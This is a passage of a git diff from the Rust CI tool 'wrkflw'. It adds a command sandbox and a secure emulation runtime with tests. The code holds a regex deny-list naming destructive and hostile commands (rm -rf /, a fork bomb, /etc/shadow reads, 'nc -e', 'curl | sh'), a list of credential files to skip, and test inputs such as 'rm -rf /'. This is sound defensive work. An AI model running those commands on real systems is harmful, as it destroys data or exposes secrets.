wrkflw_logging::info(&format!(
|
||||
"Created new sandbox with workspace: {}",
|
||||
workspace.path().display()
|
||||
));
|
||||
|
||||
Ok(Self {
|
||||
config,
|
||||
workspace,
|
||||
dangerous_patterns,
|
||||
})
|
||||
}
|
||||
|
||||
/// Execute a command in the sandbox
|
||||
pub async fn execute_command(
|
||||
&self,
|
||||
command: &[&str],
|
||||
env_vars: &[(&str, &str)],
|
||||
working_dir: &Path,
|
||||
) -> Result<crate::container::ContainerOutput, SandboxError> {
|
||||
if command.is_empty() {
|
||||
return Err(SandboxError::ExecutionError {
|
||||
reason: "Empty command".to_string(),
|
||||
});
|
||||
}
|
||||
|
||||
let command_str = command.join(" ");
|
||||
|
||||
// Step 1: Validate command
|
||||
self.validate_command(&command_str)?;
|
||||
|
||||
// Step 2: Setup sandbox environment
|
||||
let sandbox_dir = self.setup_sandbox_environment(working_dir)?;
|
||||
|
||||
// Step 3: Execute with limits
|
||||
self.execute_with_limits(command, env_vars, &sandbox_dir)
|
||||
.await
|
||||
}
|
||||
|
||||
/// Validate that a command is safe to execute
|
||||
fn validate_command(&self, command_str: &str) -> Result<(), SandboxError> {
|
||||
// Check for dangerous patterns first
|
||||
for pattern in &self.dangerous_patterns {
|
||||
if pattern.is_match(command_str) {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🚫 Blocked dangerous command pattern: {}",
|
||||
command_str
|
||||
));
|
||||
return Err(SandboxError::DangerousPattern {
|
||||
pattern: command_str.to_string(),
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
// Split command by shell operators to validate each part
|
||||
let command_parts = self.split_shell_command(command_str);
|
||||
|
||||
for part in command_parts {
|
||||
let part = part.trim();
|
||||
if part.is_empty() {
|
||||
continue;
|
||||
}
|
||||
|
||||
// Extract the base command from this part
|
||||
let base_command = part.split_whitespace().next().unwrap_or("");
|
||||
let command_name = Path::new(base_command)
|
||||
.file_name()
|
||||
.and_then(|s| s.to_str())
|
||||
.unwrap_or(base_command);
|
||||
|
||||
// Skip shell built-ins and operators
|
||||
if self.is_shell_builtin(command_name) {
|
||||
continue;
|
||||
}
|
||||
|
||||
// Check blocked commands
|
||||
if self.config.blocked_commands.contains(command_name) {
|
||||
wrkflw_logging::warning(&format!("🚫 Blocked command: {}", command_name));
|
||||
return Err(SandboxError::BlockedCommand {
|
||||
command: command_name.to_string(),
|
||||
});
|
||||
}
|
||||
|
||||
// In strict mode, only allow whitelisted commands
|
||||
if self.config.strict_mode && !self.config.allowed_commands.contains(command_name) {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🚫 Command not in whitelist (strict mode): {}",
|
||||
command_name
|
||||
));
|
||||
return Err(SandboxError::BlockedCommand {
|
||||
command: command_name.to_string(),
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
wrkflw_logging::info(&format!("✅ Command validation passed: {}", command_str));
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Split shell command by operators while preserving quoted strings
|
||||
fn split_shell_command(&self, command_str: &str) -> Vec<String> {
|
||||
// Simple split by common shell operators
|
||||
// This is not a full shell parser but handles most cases
|
||||
let separators = ["&&", "||", ";", "|"];
|
||||
let mut parts = vec![command_str.to_string()];
|
||||
|
||||
for separator in separators {
|
||||
let mut new_parts = Vec::new();
|
||||
for part in parts {
|
||||
let split_parts: Vec<String> = part
|
||||
.split(separator)
|
||||
.map(|s| s.trim().to_string())
|
||||
.filter(|s| !s.is_empty())
|
||||
.collect();
|
||||
new_parts.extend(split_parts);
|
||||
}
|
||||
parts = new_parts;
|
||||
}
|
||||
|
||||
parts
|
||||
}
|
||||
|
||||
/// Check if a command is a shell built-in
|
||||
fn is_shell_builtin(&self, command: &str) -> bool {
|
||||
let builtins = [
|
||||
"true", "false", "test", "[", "echo", "printf", "cd", "pwd", "export", "set", "unset",
|
||||
"alias", "history", "jobs", "fg", "bg", "wait", "read",
|
||||
];
|
||||
builtins.contains(&command)
|
||||
}
|
||||
|
||||
/// Setup isolated sandbox environment
|
||||
fn setup_sandbox_environment(&self, working_dir: &Path) -> Result<PathBuf, SandboxError> {
|
||||
let sandbox_root = self.workspace.path();
|
||||
let sandbox_workspace = sandbox_root.join("workspace");
|
||||
|
||||
// Create sandbox directory structure
|
||||
fs::create_dir_all(&sandbox_workspace).map_err(|e| SandboxError::SandboxSetupError {
|
||||
reason: format!("Failed to create sandbox workspace: {}", e),
|
||||
})?;
|
||||
|
||||
// Copy allowed files to sandbox (if working_dir exists and is allowed)
|
||||
if working_dir.exists() && self.is_path_allowed(working_dir, false) {
|
||||
self.copy_safe_files(working_dir, &sandbox_workspace)?;
|
||||
}
|
||||
|
||||
wrkflw_logging::info(&format!(
|
||||
"Sandbox environment ready: {}",
|
||||
sandbox_workspace.display()
|
||||
));
|
||||
|
||||
Ok(sandbox_workspace)
|
||||
}
|
||||
|
||||
/// Copy files safely to sandbox, excluding dangerous files
|
||||
fn copy_safe_files(&self, source: &Path, dest: &Path) -> Result<(), SandboxError> {
|
||||
for entry in fs::read_dir(source).map_err(|e| SandboxError::SandboxSetupError {
|
||||
reason: format!("Failed to read source directory: {}", e),
|
||||
})? {
|
||||
let entry = entry.map_err(|e| SandboxError::SandboxSetupError {
|
||||
reason: format!("Failed to read directory entry: {}", e),
|
||||
})?;
|
||||
|
||||
let path = entry.path();
|
||||
let file_name = path.file_name().and_then(|s| s.to_str()).unwrap_or("");
|
||||
|
||||
// Skip dangerous or sensitive files
|
||||
if self.should_skip_file(file_name) {
|
||||
continue;
|
||||
}
|
||||
|
||||
let dest_path = dest.join(file_name);
|
||||
|
||||
if path.is_file() {
|
||||
fs::copy(&path, &dest_path).map_err(|e| SandboxError::SandboxSetupError {
|
||||
reason: format!("Failed to copy file: {}", e),
|
||||
})?;
|
||||
} else if path.is_dir() && !self.should_skip_directory(file_name) {
|
||||
fs::create_dir_all(&dest_path).map_err(|e| SandboxError::SandboxSetupError {
|
||||
reason: format!("Failed to create directory: {}", e),
|
||||
})?;
|
||||
self.copy_safe_files(&path, &dest_path)?;
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Execute command with resource limits and monitoring
|
||||
async fn execute_with_limits(
|
||||
&self,
|
||||
command: &[&str],
|
||||
env_vars: &[(&str, &str)],
|
||||
working_dir: &Path,
|
||||
) -> Result<crate::container::ContainerOutput, SandboxError> {
|
||||
// Join command parts and execute via shell for proper handling of operators
|
||||
let command_str = command.join(" ");
|
||||
|
||||
let mut cmd = Command::new("sh");
|
||||
cmd.arg("-c");
|
||||
cmd.arg(&command_str);
|
||||
cmd.current_dir(working_dir);
|
||||
cmd.stdout(Stdio::piped());
|
||||
cmd.stderr(Stdio::piped());
|
||||
|
||||
// Set environment variables (filtered)
|
||||
for (key, value) in env_vars {
|
||||
if self.is_env_var_safe(key) {
|
||||
cmd.env(key, value);
|
||||
}
|
||||
}
|
||||
|
||||
// Add sandbox-specific environment variables
|
||||
cmd.env("WRKFLW_SANDBOXED", "true");
|
||||
cmd.env("WRKFLW_SANDBOX_MODE", "strict");
|
||||
|
||||
// Execute with timeout
|
||||
let timeout_duration = self.config.max_execution_time;
|
||||
|
||||
wrkflw_logging::info(&format!(
|
||||
"🏃 Executing sandboxed command: {} (timeout: {}s)",
|
||||
command.join(" "),
|
||||
timeout_duration.as_secs()
|
||||
));
|
||||
|
||||
let start_time = std::time::Instant::now();
|
||||
|
||||
let result = tokio::time::timeout(timeout_duration, async {
|
||||
let output = cmd.output().map_err(|e| SandboxError::ExecutionError {
|
||||
reason: format!("Command execution failed: {}", e),
|
||||
})?;
|
||||
|
||||
Ok(crate::container::ContainerOutput {
|
||||
stdout: String::from_utf8_lossy(&output.stdout).to_string(),
|
||||
stderr: String::from_utf8_lossy(&output.stderr).to_string(),
|
||||
exit_code: output.status.code().unwrap_or(-1),
|
||||
})
|
||||
})
|
||||
.await;
|
||||
|
||||
let execution_time = start_time.elapsed();
|
||||
|
||||
match result {
|
||||
Ok(output_result) => {
|
||||
wrkflw_logging::info(&format!(
|
||||
"✅ Sandboxed command completed in {:.2}s",
|
||||
execution_time.as_secs_f64()
|
||||
));
|
||||
output_result
|
||||
}
|
||||
Err(_) => {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"⏰ Sandboxed command timed out after {:.2}s",
|
||||
timeout_duration.as_secs_f64()
|
||||
));
|
||||
Err(SandboxError::ExecutionTimeout {
|
||||
seconds: timeout_duration.as_secs(),
|
||||
})
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Check if a path is allowed for access
|
||||
fn is_path_allowed(&self, path: &Path, write_access: bool) -> bool {
|
||||
let abs_path = path.canonicalize().unwrap_or_else(|_| path.to_path_buf());
|
||||
|
||||
if write_access {
|
||||
self.config
|
||||
.allowed_write_paths
|
||||
.iter()
|
||||
.any(|allowed| abs_path.starts_with(allowed))
|
||||
} else {
|
||||
self.config
|
||||
.allowed_read_paths
|
||||
.iter()
|
||||
.any(|allowed| abs_path.starts_with(allowed))
|
||||
|| self
|
||||
.config
|
||||
.allowed_write_paths
|
||||
.iter()
|
||||
.any(|allowed| abs_path.starts_with(allowed))
|
||||
}
|
||||
}
|
||||
|
||||
/// Check if an environment variable is safe to pass through
|
||||
fn is_env_var_safe(&self, key: &str) -> bool {
|
||||
// Block dangerous environment variables
|
||||
let dangerous_env_vars = [
|
||||
"LD_PRELOAD",
|
||||
"LD_LIBRARY_PATH",
|
||||
"DYLD_INSERT_LIBRARIES",
|
||||
"DYLD_LIBRARY_PATH",
|
||||
"PATH",
|
||||
"HOME",
|
||||
"SHELL",
|
||||
];
|
||||
|
||||
!dangerous_env_vars.contains(&key)
|
||||
}
|
||||
|
||||
/// Check if a file should be skipped during copying
|
||||
fn should_skip_file(&self, filename: &str) -> bool {
|
||||
let dangerous_files = [
|
||||
".ssh",
|
||||
".gnupg",
|
||||
".aws",
|
||||
".docker",
|
||||
"id_rsa",
|
||||
"id_ed25519",
|
||||
"credentials",
|
||||
"config",
|
||||
".env",
|
||||
".secrets",
|
||||
];
|
||||
|
||||
dangerous_files
|
||||
.iter()
|
||||
.any(|pattern| filename.contains(pattern))
|
||||
|| filename.starts_with('.') && filename != ".gitignore" && filename != ".github"
|
||||
}
|
||||
|
||||
/// Check if a directory should be skipped
|
||||
fn should_skip_directory(&self, dirname: &str) -> bool {
|
||||
let skip_dirs = [
|
||||
"target",
|
||||
"node_modules",
|
||||
".git",
|
||||
".cargo",
|
||||
".npm",
|
||||
".cache",
|
||||
"build",
|
||||
"dist",
|
||||
"tmp",
|
||||
"temp",
|
||||
];
|
||||
|
||||
skip_dirs.contains(&dirname)
|
||||
}
|
||||
|
||||
/// Compile regex patterns for dangerous command detection
|
||||
fn compile_dangerous_patterns() -> Vec<Regex> {
|
||||
let patterns = [
|
||||
r"rm\s+.*-rf?\s*/", // rm -rf /
|
||||
r"dd\s+.*of=/dev/", // dd ... of=/dev/...
|
||||
r">\s*/dev/sd[a-z]", // > /dev/sda
|
||||
r"mkfs\.", // mkfs.ext4, etc.
|
||||
r"fdisk\s+/dev/", // fdisk /dev/...
|
||||
r"mount\s+.*\s+/", // mount ... /
|
||||
r"chroot\s+/", // chroot /
|
||||
r"sudo\s+", // sudo commands
|
||||
r"su\s+", // su commands
|
||||
r"bash\s+-c\s+.*rm.*-rf", // bash -c "rm -rf ..."
|
||||
r"sh\s+-c\s+.*rm.*-rf", // sh -c "rm -rf ..."
|
||||
r"eval\s+.*rm.*-rf", // eval "rm -rf ..."
|
||||
r":\(\)\{.*;\};:", // Fork bomb
|
||||
r"/proc/sys/", // /proc/sys access
|
||||
r"/etc/passwd", // /etc/passwd access
|
||||
r"/etc/shadow", // /etc/shadow access
|
||||
r"nc\s+.*-e", // netcat with exec
|
||||
r"wget\s+.*\|\s*sh", // wget ... | sh
|
||||
r"curl\s+.*\|\s*sh", // curl ... | sh
|
||||
];
|
||||
|
||||
patterns
|
||||
.iter()
|
||||
.filter_map(|pattern| {
|
||||
Regex::new(pattern)
|
||||
.map_err(|e| {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"Invalid regex pattern {}: {}",
|
||||
pattern, e
|
||||
));
|
||||
e
|
||||
})
|
||||
.ok()
|
||||
})
|
||||
.collect()
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a default sandbox configuration for CI/CD workflows
|
||||
pub fn create_workflow_sandbox_config() -> SandboxConfig {
|
||||
let mut allowed_read_paths = HashSet::new();
|
||||
allowed_read_paths.insert(PathBuf::from("."));
|
||||
|
||||
let mut allowed_write_paths = HashSet::new();
|
||||
allowed_write_paths.insert(PathBuf::from("."));
|
||||
|
||||
SandboxConfig {
|
||||
max_execution_time: Duration::from_secs(1800), // 30 minutes
|
||||
max_memory_mb: 2048, // 2GB
|
||||
max_processes: 50,
|
||||
allow_network: true,
|
||||
strict_mode: false,
|
||||
allowed_read_paths,
|
||||
allowed_write_paths,
|
||||
..Default::default()
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a strict sandbox configuration for untrusted code
|
||||
pub fn create_strict_sandbox_config() -> SandboxConfig {
|
||||
let mut allowed_read_paths = HashSet::new();
|
||||
allowed_read_paths.insert(PathBuf::from("."));
|
||||
|
||||
let mut allowed_write_paths = HashSet::new();
|
||||
allowed_write_paths.insert(PathBuf::from("."));
|
||||
|
||||
// Very limited command set
|
||||
let allowed_commands = ["echo", "cat", "ls", "pwd", "date"]
|
||||
.iter()
|
||||
.map(|s| s.to_string())
|
||||
.collect();
|
||||
|
||||
SandboxConfig {
|
||||
max_execution_time: Duration::from_secs(60), // 1 minute
|
||||
max_memory_mb: 128, // 128MB
|
||||
max_processes: 5,
|
||||
allow_network: false,
|
||||
strict_mode: true,
|
||||
allowed_read_paths,
|
||||
allowed_write_paths,
|
||||
allowed_commands,
|
||||
..Default::default()
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_dangerous_pattern_detection() {
|
||||
let sandbox = Sandbox::new(SandboxConfig::default()).unwrap();
|
||||
|
||||
// Should block dangerous commands
|
||||
assert!(sandbox.validate_command("rm -rf /").is_err());
|
||||
assert!(sandbox
|
||||
.validate_command("dd if=/dev/zero of=/dev/sda")
|
||||
.is_err());
|
||||
assert!(sandbox.validate_command("sudo rm -rf /home").is_err());
|
||||
assert!(sandbox.validate_command("bash -c 'rm -rf /'").is_err());
|
||||
|
||||
// Should allow safe commands
|
||||
assert!(sandbox.validate_command("echo hello").is_ok());
|
||||
assert!(sandbox.validate_command("ls -la").is_ok());
|
||||
assert!(sandbox.validate_command("cargo build").is_ok());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_command_whitelist() {
|
||||
let config = create_strict_sandbox_config();
|
||||
let sandbox = Sandbox::new(config).unwrap();
|
||||
|
||||
// Should allow whitelisted commands
|
||||
assert!(sandbox.validate_command("echo hello").is_ok());
|
||||
assert!(sandbox.validate_command("ls").is_ok());
|
||||
|
||||
// Should block non-whitelisted commands
|
||||
assert!(sandbox.validate_command("git clone").is_err());
|
||||
assert!(sandbox.validate_command("cargo build").is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_file_filtering() {
|
||||
let sandbox = Sandbox::new(SandboxConfig::default()).unwrap();
|
||||
|
||||
// Should skip dangerous files
|
||||
assert!(sandbox.should_skip_file("id_rsa"));
|
||||
assert!(sandbox.should_skip_file(".ssh"));
|
||||
assert!(sandbox.should_skip_file("credentials"));
|
||||
|
||||
// Should allow safe files
|
||||
assert!(!sandbox.should_skip_file("Cargo.toml"));
|
||||
assert!(!sandbox.should_skip_file("README.md"));
|
||||
assert!(!sandbox.should_skip_file(".gitignore"));
|
||||
}
|
||||
}
|
||||
339
crates/runtime/src/secure_emulation.rs
Normal file
339
crates/runtime/src/secure_emulation.rs
Normal file
@@ -0,0 +1,339 @@
|
||||
use crate::container::{ContainerError, ContainerOutput, ContainerRuntime};
|
||||
use crate::sandbox::{create_workflow_sandbox_config, Sandbox, SandboxConfig, SandboxError};
|
||||
use async_trait::async_trait;
|
||||
use std::path::Path;
|
||||
use wrkflw_logging;
|
||||
|
||||
/// Secure emulation runtime that uses sandboxing for safety
|
||||
pub struct SecureEmulationRuntime {
|
||||
sandbox: Sandbox,
|
||||
}
|
||||
|
||||
impl Default for SecureEmulationRuntime {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl SecureEmulationRuntime {
|
||||
/// Create a new secure emulation runtime with default workflow-friendly configuration
|
||||
pub fn new() -> Self {
|
||||
let config = create_workflow_sandbox_config();
|
||||
let sandbox = Sandbox::new(config).expect("Failed to create sandbox");
|
||||
|
||||
wrkflw_logging::info("🔒 Initialized secure emulation runtime with sandboxing");
|
||||
|
||||
Self { sandbox }
|
||||
}
|
||||
|
||||
/// Create a new secure emulation runtime with custom sandbox configuration
|
||||
pub fn new_with_config(config: SandboxConfig) -> Result<Self, ContainerError> {
|
||||
let sandbox = Sandbox::new(config).map_err(|e| {
|
||||
ContainerError::ContainerStart(format!("Failed to create sandbox: {}", e))
|
||||
})?;
|
||||
|
||||
wrkflw_logging::info("🔒 Initialized secure emulation runtime with custom config");
|
||||
|
||||
Ok(Self { sandbox })
|
||||
}
|
||||
}
|
||||
|
||||
#[async_trait]
|
||||
impl ContainerRuntime for SecureEmulationRuntime {
|
||||
async fn run_container(
|
||||
&self,
|
||||
image: &str,
|
||||
command: &[&str],
|
||||
env_vars: &[(&str, &str)],
|
||||
working_dir: &Path,
|
||||
_volumes: &[(&Path, &Path)],
|
||||
) -> Result<ContainerOutput, ContainerError> {
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔒 Executing sandboxed command: {} (image: {})",
|
||||
command.join(" "),
|
||||
image
|
||||
));
|
||||
|
||||
// Use sandbox to execute the command safely
|
||||
let result = self
|
||||
.sandbox
|
||||
.execute_command(command, env_vars, working_dir)
|
||||
.await;
|
||||
|
||||
match result {
|
||||
Ok(output) => {
|
||||
wrkflw_logging::info("✅ Sandboxed command completed successfully");
|
||||
Ok(output)
|
||||
}
|
||||
Err(SandboxError::BlockedCommand { command }) => {
|
||||
let error_msg = format!(
|
||||
"🚫 SECURITY BLOCK: Command '{}' is not allowed in secure emulation mode. \
|
||||
This command was blocked for security reasons. \
|
||||
If you need to run this command, please use Docker or Podman mode instead.",
|
||||
command
|
||||
);
|
||||
wrkflw_logging::warning(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
Err(SandboxError::DangerousPattern { pattern }) => {
|
||||
let error_msg = format!(
|
||||
"🚫 SECURITY BLOCK: Dangerous command pattern detected: '{}'. \
|
||||
This command was blocked because it matches a known dangerous pattern. \
|
||||
Please review your workflow for potentially harmful commands.",
|
||||
pattern
|
||||
);
|
||||
wrkflw_logging::warning(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
Err(SandboxError::ExecutionTimeout { seconds }) => {
|
||||
let error_msg = format!(
|
||||
"⏰ Command execution timed out after {} seconds. \
|
||||
Consider optimizing your command or increasing timeout limits.",
|
||||
seconds
|
||||
);
|
||||
wrkflw_logging::warning(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
Err(SandboxError::PathAccessDenied { path }) => {
|
||||
let error_msg = format!(
|
||||
"🚫 Path access denied: '{}'. \
|
||||
The sandbox restricts file system access for security.",
|
||||
path
|
||||
);
|
||||
wrkflw_logging::warning(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
Err(SandboxError::ResourceLimitExceeded { resource }) => {
|
||||
let error_msg = format!(
|
||||
"📊 Resource limit exceeded: {}. \
|
||||
Your command used too many system resources.",
|
||||
resource
|
||||
);
|
||||
wrkflw_logging::warning(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
Err(e) => {
|
||||
let error_msg = format!("Sandbox execution failed: {}", e);
|
||||
wrkflw_logging::error(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
async fn pull_image(&self, image: &str) -> Result<(), ContainerError> {
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔒 Secure emulation: Pretending to pull image {}",
|
||||
image
|
||||
));
|
||||
Ok(())
|
||||
}
|
||||
|
||||
async fn build_image(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔒 Secure emulation: Pretending to build image {} from {}",
|
||||
tag,
|
||||
dockerfile.display()
|
||||
));
|
||||
Ok(())
|
||||
}
|
||||
|
||||
async fn prepare_language_environment(
|
||||
&self,
|
||||
language: &str,
|
||||
version: Option<&str>,
|
||||
_additional_packages: Option<Vec<String>>,
|
||||
) -> Result<String, ContainerError> {
|
||||
// For secure emulation runtime, we'll use a simplified approach
|
||||
// that doesn't require building custom images
|
||||
let base_image = match language {
|
||||
"python" => version.map_or("python:3.11-slim".to_string(), |v| format!("python:{}", v)),
|
||||
"node" => version.map_or("node:20-slim".to_string(), |v| format!("node:{}", v)),
|
||||
"java" => version.map_or("eclipse-temurin:17-jdk".to_string(), |v| {
|
||||
format!("eclipse-temurin:{}", v)
|
||||
}),
|
||||
"go" => version.map_or("golang:1.21-slim".to_string(), |v| format!("golang:{}", v)),
|
||||
"dotnet" => version.map_or("mcr.microsoft.com/dotnet/sdk:7.0".to_string(), |v| {
|
||||
format!("mcr.microsoft.com/dotnet/sdk:{}", v)
|
||||
}),
|
||||
"rust" => version.map_or("rust:latest".to_string(), |v| format!("rust:{}", v)),
|
||||
_ => {
|
||||
return Err(ContainerError::ContainerStart(format!(
|
||||
"Unsupported language: {}",
|
||||
language
|
||||
)))
|
||||
}
|
||||
};
|
||||
|
||||
// For emulation, we'll just return the base image
|
||||
// The actual package installation will be handled during container execution
|
||||
Ok(base_image)
|
||||
}
|
||||
}
|
||||
|
||||
/// Handle special actions in secure emulation mode
|
||||
pub async fn handle_special_action_secure(action: &str) -> Result<(), ContainerError> {
|
||||
// Extract owner, repo and version from the action
|
||||
let action_parts: Vec<&str> = action.split('@').collect();
|
||||
let action_name = action_parts[0];
|
||||
let action_version = if action_parts.len() > 1 {
|
||||
action_parts[1]
|
||||
} else {
|
||||
"latest"
|
||||
};
|
||||
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔒 Processing action in secure mode: {} @ {}",
|
||||
action_name, action_version
|
||||
));
|
||||
|
||||
// In secure mode, we're more restrictive about what actions we allow
|
||||
match action_name {
|
||||
// Core GitHub actions that are generally safe
|
||||
name if name.starts_with("actions/checkout") => {
|
||||
wrkflw_logging::info("✅ Checkout action - workspace files are prepared securely");
|
||||
}
|
||||
name if name.starts_with("actions/setup-node") => {
|
||||
wrkflw_logging::info("🟡 Node.js setup - using system Node.js in secure mode");
|
||||
check_command_available_secure("node", "Node.js", "https://nodejs.org/");
|
||||
}
|
||||
name if name.starts_with("actions/setup-python") => {
|
||||
wrkflw_logging::info("🟡 Python setup - using system Python in secure mode");
|
||||
check_command_available_secure("python", "Python", "https://www.python.org/downloads/");
|
||||
}
|
||||
name if name.starts_with("actions/setup-java") => {
|
||||
wrkflw_logging::info("🟡 Java setup - using system Java in secure mode");
|
||||
check_command_available_secure("java", "Java", "https://adoptium.net/");
|
||||
}
|
||||
name if name.starts_with("actions/cache") => {
|
||||
wrkflw_logging::info("🟡 Cache action - caching disabled in secure emulation mode");
|
||||
}
|
||||
|
||||
// Rust-specific actions
|
||||
name if name.starts_with("actions-rs/cargo") => {
|
||||
wrkflw_logging::info("🟡 Rust cargo action - using system Rust in secure mode");
|
||||
check_command_available_secure("cargo", "Rust/Cargo", "https://rustup.rs/");
|
||||
}
|
||||
name if name.starts_with("actions-rs/toolchain") => {
|
||||
wrkflw_logging::info("🟡 Rust toolchain action - using system Rust in secure mode");
|
||||
check_command_available_secure("rustc", "Rust", "https://rustup.rs/");
|
||||
}
|
||||
name if name.starts_with("actions-rs/fmt") => {
|
||||
wrkflw_logging::info("🟡 Rust formatter action - using system rustfmt in secure mode");
|
||||
check_command_available_secure("rustfmt", "rustfmt", "rustup component add rustfmt");
|
||||
}
|
||||
|
||||
// Potentially dangerous actions that we warn about
|
||||
name if name.contains("docker") || name.contains("container") => {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🚫 Docker/container action '{}' is not supported in secure emulation mode. \
|
||||
Use Docker or Podman mode for container actions.",
|
||||
action_name
|
||||
));
|
||||
}
|
||||
name if name.contains("ssh") || name.contains("deploy") => {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🚫 SSH/deployment action '{}' is restricted in secure emulation mode. \
|
||||
Use Docker or Podman mode for deployment actions.",
|
||||
action_name
|
||||
));
|
||||
}
|
||||
|
||||
// Unknown actions
|
||||
_ => {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🟡 Unknown action '{}' in secure emulation mode. \
|
||||
Some functionality may be limited or unavailable.",
|
||||
action_name
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Check if a command is available, with security-focused messaging
|
||||
fn check_command_available_secure(command: &str, name: &str, install_url: &str) {
|
||||
use std::process::Command;
|
||||
|
||||
let is_available = Command::new("which")
|
||||
.arg(command)
|
||||
.output()
|
||||
.map(|output| output.status.success())
|
||||
.unwrap_or(false);
|
||||
|
||||
if !is_available {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🔧 {} is required but not found on the system",
|
||||
name
|
||||
));
|
||||
wrkflw_logging::info(&format!(
|
||||
"To use this action in secure mode, please install {}: {}",
|
||||
name, install_url
|
||||
));
|
||||
wrkflw_logging::info(&format!(
|
||||
"Alternatively, use Docker or Podman mode for automatic {} installation",
|
||||
name
|
||||
));
|
||||
} else {
|
||||
// Try to get version information
|
||||
if let Ok(output) = Command::new(command).arg("--version").output() {
|
||||
if output.status.success() {
|
||||
let version = String::from_utf8_lossy(&output.stdout);
|
||||
wrkflw_logging::info(&format!(
|
||||
"✅ Using system {} in secure mode: {}",
|
||||
name,
|
||||
version.trim()
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
use crate::sandbox::create_strict_sandbox_config;
|
||||
use std::path::PathBuf;
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_secure_emulation_blocks_dangerous_commands() {
|
||||
let config = create_strict_sandbox_config();
|
||||
let runtime = SecureEmulationRuntime::new_with_config(config).unwrap();
|
||||
|
||||
// Should block dangerous commands
|
||||
let result = runtime
|
||||
.run_container(
|
||||
"alpine:latest",
|
||||
&["rm", "-rf", "/"],
|
||||
&[],
|
||||
&PathBuf::from("."),
|
||||
&[],
|
||||
)
|
||||
.await;
|
||||
|
||||
assert!(result.is_err());
|
||||
let error_msg = result.unwrap_err().to_string();
|
||||
assert!(error_msg.contains("SECURITY BLOCK"));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_secure_emulation_allows_safe_commands() {
|
||||
let runtime = SecureEmulationRuntime::new();
|
||||
|
||||
// Should allow safe commands
|
||||
let result = runtime
|
||||
.run_container(
|
||||
"alpine:latest",
|
||||
&["echo", "hello world"],
|
||||
&[],
|
||||
&PathBuf::from("."),
|
||||
&[],
|
||||
)
|
||||
.await;
|
||||
|
||||
assert!(result.is_ok());
|
||||
let output = result.unwrap();
|
||||
assert!(output.stdout.contains("hello world"));
|
||||
assert_eq!(output.exit_code, 0);
|
||||
}
|
||||
}
|
||||
@@ -12,12 +12,12 @@ categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.6.0" }
|
||||
wrkflw-evaluator = { path = "../evaluator", version = "0.6.0" }
|
||||
wrkflw-executor = { path = "../executor", version = "0.6.0" }
|
||||
wrkflw-logging = { path = "../logging", version = "0.6.0" }
|
||||
wrkflw-utils = { path = "../utils", version = "0.6.0" }
|
||||
wrkflw-github = { path = "../github", version = "0.6.0" }
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
wrkflw-evaluator = { path = "../evaluator", version = "0.7.0" }
|
||||
wrkflw-executor = { path = "../executor", version = "0.7.0" }
|
||||
wrkflw-logging = { path = "../logging", version = "0.7.0" }
|
||||
wrkflw-utils = { path = "../utils", version = "0.7.0" }
|
||||
wrkflw-github = { path = "../github", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
chrono.workspace = true
|
||||
|
||||
@@ -154,6 +154,15 @@ fn run_tui_event_loop(
|
||||
if last_tick.elapsed() >= tick_rate {
|
||||
app.tick();
|
||||
app.update_running_workflow_progress();
|
||||
|
||||
// Check for log processing updates (includes system log change detection)
|
||||
app.check_log_processing_updates();
|
||||
|
||||
// Request log processing if needed
|
||||
if app.logs_need_update {
|
||||
app.request_log_processing_update();
|
||||
}
|
||||
|
||||
last_tick = Instant::now();
|
||||
}
|
||||
|
||||
@@ -180,6 +189,25 @@ fn run_tui_event_loop(
|
||||
continue;
|
||||
}
|
||||
|
||||
// Handle help overlay scrolling
|
||||
if app.show_help {
|
||||
match key.code {
|
||||
KeyCode::Up | KeyCode::Char('k') => {
|
||||
app.scroll_help_up();
|
||||
continue;
|
||||
}
|
||||
KeyCode::Down | KeyCode::Char('j') => {
|
||||
app.scroll_help_down();
|
||||
continue;
|
||||
}
|
||||
KeyCode::Esc | KeyCode::Char('?') => {
|
||||
app.show_help = false;
|
||||
continue;
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
|
||||
match key.code {
|
